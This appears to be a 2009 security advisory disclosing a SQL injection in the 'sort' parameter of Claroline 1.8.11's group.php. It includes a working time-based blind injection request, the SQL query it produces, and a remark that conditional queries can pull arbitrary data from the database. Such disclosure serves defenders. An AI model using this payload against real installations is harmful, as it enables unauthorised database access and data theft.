Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Claroline (1.8.11)
Product Homepage: http://www.claroline.net/
Versions Affected: v.1.8.11 (Other versions may also be affected)
Severity: High
The 'sort' parameter from '/claroline/group/group.php' is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Example:
the request:
- Code: Select all
http://somehost/claroline/group/group.php?cidReq=TEST1&sort=IF(FALSE,1,SLEEP(10))&dir=3
will generate the flowing SQL query:
- Code: Select all
SELECT * FROM `c_TEST1_group_team` `g`
# retrieve the tutor id
LEFT JOIN `claroline_1_8_11`.`cl_user` AS `tutor`
ON `tutor`.`user_id` = `g`.`tutor`
# retrieve the user group(s)
LEFT JOIN `c_TEST1_group_rel_team_user` AS `ug`
ON `ug`.`team` = `g`.`id` AND `ug`.`user` = 0
# count the registered users in each group
LEFT JOIN `c_TEST1_group_rel_team_user` `ug2`
ON `ug2`.`team` = `g`.`id`
GROUP BY `g`.`id`
ORDER BY IF(FALSE,1,SLEEP(10)) DESC LIMIT 0, 20
This query will lag about 10 seconds. Replacing the FALSE element (from IF(FALSE,1,SLEEP(10))) with conditional queries may be used to extract arbitrary data from the database.
Status:
1. Contacted the author at: May 07, 2009 viahttp://forum.claroline.net./
Note:
-the original advisory place is at http://gsasec.blogspot.com/, but it will be published only after the vulnerability reception, validation and correction. Also at that time it will reported to Secunia and SecurityFocus.
